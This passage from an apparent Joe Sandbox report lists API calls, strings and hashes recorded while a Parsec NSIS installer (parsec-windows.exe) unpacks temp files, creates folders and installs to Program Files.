                              APIs
                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:

                              Control-flow Graph (function starting at 00404F06)
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                              • GetDlgItem.USER32(?,00000408), ref: 00404F29
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                              • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                              • DeleteObject.GDI32(00000000), ref: 00405000
                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                              • ShowWindow.USER32(?,00000005), ref: 00405162
                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                              • ImageList_Destroy.COMCTL32(?), ref: 00405330
                              • GlobalFree.KERNEL32(?), ref: 00405340
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                              • ShowWindow.USER32(?,00000000), ref: 004054EA
                              • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                              • ShowWindow.USER32(00000000), ref: 004054FC
                              Similarity
                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $>)h$M$N

                              Control-flow Graph (function starting at 0040307D)
                              APIs
                              • GetTickCount.KERNEL32 ref: 0040308E
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                              • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                              • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\PSecWin$C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft$}8@

                              Control-flow Graph (function starting at 0040657A)
                              APIs
                              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 00406695
                              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00000000,00424620,759223A0), ref: 004066A8
                              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,?,004055D6,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000), ref: 00406779
                              Similarity
                              • API ID: Directory$SystemWindowslstrcatlstrlen
                              • String ID: 0x000017F5$>)h$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 4260037668-1717792647
                              • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                              • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                              • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                              • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

                              Control-flow Graph

                              [Control-flow graph image (executed / not executed blocks): function 40176f, basic blocks 40176f-402c39; calls 402da6, 405e83, 40653d, 405e0c, 4067c4, 406873, 406008, 40602d, 40559f, 4032b4, 40657a, 405b9d and the APIs lstrcatW, CompareFileTime, SetFileTime, CloseHandle]
                              APIs
                              • lstrcatW.KERNEL32(00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017B0
                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Program Files\Parsec\parsecd.exe","C:\Program Files\Parsec\parsecd.exe",00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017D5
                                • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                • Part of subcall function 0040559F: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00424620,759223A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00424620,759223A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                • Part of subcall function 0040559F: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00403418,00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,00000000,00424620,759223A0), ref: 004055FA
                                • Part of subcall function 0040559F: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\), ref: 0040560C
                                • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: "C:\Program Files\Parsec\parsecd.exe"$C:\Program Files\Parsec$C:\Program Files\Parsec
                              • API String ID: 1941528284-119262318
                              • Opcode ID: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                              • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                              • Opcode Fuzzy Hash: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                              • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

                              Control-flow Graph

                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                              • GlobalFree.KERNEL32(?), ref: 00402A06
                              • GlobalFree.KERNEL32(00000000), ref: 00402A19
                              • CloseHandle.KERNELBASE(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                              • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                              • Opcode Fuzzy Hash: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                              • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

                              Control-flow Graph

                              [Control-flow graph image (executed / not executed blocks): function 405a6e, basic blocks 405a6e-405ae8; calls the APIs CreateDirectoryW, GetLastError, SetFileSecurityW]
                              APIs
                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                              • GetLastError.KERNEL32 ref: 00405AC5
                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                              • GetLastError.KERNEL32 ref: 00405AE4
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 3449924974-823278215
                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                              • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                              • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                              APIs
                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                              • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                              • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                              • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                              APIs
                              • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                              • wsprintfW.USER32 ref: 00404DF0
                              • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s
                              • API String ID: 3540041739-3551169577
                              • Opcode ID: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                              • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                              • Opcode Fuzzy Hash: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                              • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                              APIs
                              • GetTickCount.KERNEL32 ref: 0040607A
                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-44229769
                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                              • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                              • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                              APIs
                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Remove folder: ,?,?,00406672,80000002), ref: 00406451
                              • RegCloseKey.KERNELBASE(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\), ref: 0040645C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID: Remove folder:
                              • API String ID: 3356406503-1958208860
                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                              • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                              • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                              APIs
                              • FreeLibrary.KERNELBASE(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                              • GlobalFree.KERNEL32(?), ref: 00403B78
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: Free$GlobalLibrary
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 1100898210-823278215
                              • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                              • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                              • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                              • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                              APIs
                                • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C1C
                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: File$Attributes$DeleteDirectoryRemove
                              • String ID:
                              • API String ID: 1655745494-0
                              • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                              • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                              • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                              • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                              APIs
                              • SendMessageW.USER32(00000408,?,00000000,004040D1), ref: 00404490
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: x
                              • API String ID: 3850602802-2363233923
                              • Opcode ID: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                              • Instruction ID: 1b38e0d23eed931a714c5b599c5829f4d2050063c4158495342b67dc2c27a344
                              • Opcode Fuzzy Hash: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                              • Instruction Fuzzy Hash: 10C01271140200EACB004B00DE01F0A7A20B7A0B02F209039F381210B087B05422DB0C
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 00405682
                                • Part of subcall function 004044E5: SendMessageW.USER32(000204F8,00000000,00000000,00000000), ref: 004044F7
                              • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 004056CE
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
